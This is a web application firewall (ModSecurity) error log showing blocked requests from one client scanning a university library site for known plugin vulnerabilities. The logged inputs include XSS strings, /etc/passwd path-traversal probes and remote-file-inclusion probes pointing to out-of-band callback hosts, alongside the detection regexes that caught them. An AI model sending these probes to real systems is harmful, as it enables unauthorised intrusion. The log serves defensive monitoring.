[Tue Aug 29 11:54:52.621744 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:formId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:formId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/tidio-form/popup-insert-help.php"] [unique_id "ZO16HMCo-f0AAAqUB58AAAAb"]
[Tue Aug 29 11:54:54.250656 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:page: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16HsCo-f0AAAqSwl0AAAAN"]
[Tue Aug 29 11:54:55.629328 2023] [:error] [pid 2708] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnijtjmimvgniikdb06hqijqnr3pb1s.oast.site found within TX:1: cjmnijtjmimvgniikdb06hqijqnr3pb1s.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/plugins/servlet/oauth/users/icon-uri"] [unique_id "ZO16H8Co-f0AAAqUB6kAAAAb"]
[Tue Aug 29 11:54:55.802255 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:view: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16H8Co-f0AAAqRzGQAAAAM"]
[Tue Aug 29 11:54:56.783461 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IMCo-f0AAApXgi0AAAAU"]
[Tue Aug 29 11:54:58.287442 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\r\\n. [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAApbUZUAAAAh"]
[Tue Aug 29 11:54:58.287481 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "Multipart parsing error: Multipart: Invalid part header (colon missing): Test\\x5cr\\x5cn."] [severity "CRITICAL"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php"] [unique_id "ZO16IsCo-f0AAApbUZUAAAAh"]
[Tue Aug 29 11:54:58.320534 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:type: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/log_download.cgi"] [unique_id "ZO16IsCo-f0AAAqRzG4AAAAM"]
[Tue Aug 29 11:54:59.571282 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/CMSPages/GetDocLink.ashx"] [unique_id "ZO16I8Co-f0AAAoT7asAAAAD"]
[Tue Aug 29 11:54:59.714919 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:service. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:service: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/login/"] [unique_id "ZO16I8Co-f0AAAoT7a0AAAAD"]
[Tue Aug 29 11:55:02.825922 2023] [:error] [pid 2721] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO16JsCo-f0AAAqhOCYAAAAE"]
[Tue Aug 29 11:55:04.266425 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO16KMCo-f0AAAoz8BMAAAAS"]
[Tue Aug 29 11:55:04.618929 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-family. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-family: '/onerror='alert(document.domain)'/b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KMCo-f0AAAqsV1cAAAAB"]
[Tue Aug 29 11:55:05.795165 2023] [:error] [pid 2705] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' onerror=alert(document.domain) b='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16KcCo-f0AAAqRzIsAAAAM"]
[Tue Aug 29 11:55:05.975271 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO16KcCo-f0AAApHRcgAAAAP"]
[Tue Aug 29 11:55:06.627252 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:img. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:img: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/components/com_rwcards/captcha/captcha_image.php"] [unique_id "ZO16KsCo-f0AAApbUb8AAAAh"]
[Tue Aug 29 11:55:07.540986 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:font-weight. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:font-weight: ' accesskey='x' onclick='alert(document.domain)' class='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/titan-framework/lib/iframe-font-preview.php"] [unique_id "ZO16K8Co-f0AAAqsV2gAAAAB"]
[Tue Aug 29 11:55:08.542955 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16LMCo-f0AAAolKk4AAAAe"]
[Tue Aug 29 11:55:11.673448 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:arr_ajax_msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: gnuboard<svg found within ARGS:arr_ajax_msg: gnuboard<svg onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/plugin/sms5/ajax.sms_emoticon.php"] [unique_id "ZO16L8Co-f0AAAqqtbcAAAAA"]
[Tue Aug 29 11:55:11.880351 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me found within TX:1: oast.me"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin"] [unique_id "ZO16L8Co-f0AAAqY6AMAAAAr"]
[Tue Aug 29 11:55:12.664774 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/email_passthrough.php"] [unique_id "ZO16MMCo-f0AAApbUdkAAAAh"]
[Tue Aug 29 11:55:14.580368 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/boafrm/formWlanRedirect"] [unique_id "ZO16MsCo-f0AAAqqtcEAAAAA"]
[Tue Aug 29 11:55:14.675066 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:form_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:form_id: xxxxxx\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16MsCo-f0AAAqsV4QAAAAB"]
[Tue Aug 29 11:55:16.597039 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:query[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:query[]: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16NMCo-f0AAAqY6BQAAAAr"]
[Tue Aug 29 11:55:16.879589 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NMCo-f0AAAqY6B4AAAAr"]
[Tue Aug 29 11:55:17.551732 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqeFTAAAAAx"]
[Tue Aug 29 11:55:17.696387 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "digilibfh.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqvjm4AAAAE"]
[Tue Aug 29 11:55:18.666774 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqvjnQAAAAE"]
[Tue Aug 29 11:55:19.678800 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAoz8EQAAAAS"]
[Tue Aug 29 11:55:19.800008 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAolKmUAAAAe"]
[Tue Aug 29 11:55:20.549519 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibfh.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAoz8EkAAAAS"]
[Tue Aug 29 11:55:22.532718 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibfh.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAAqqtdwAAAAA"]
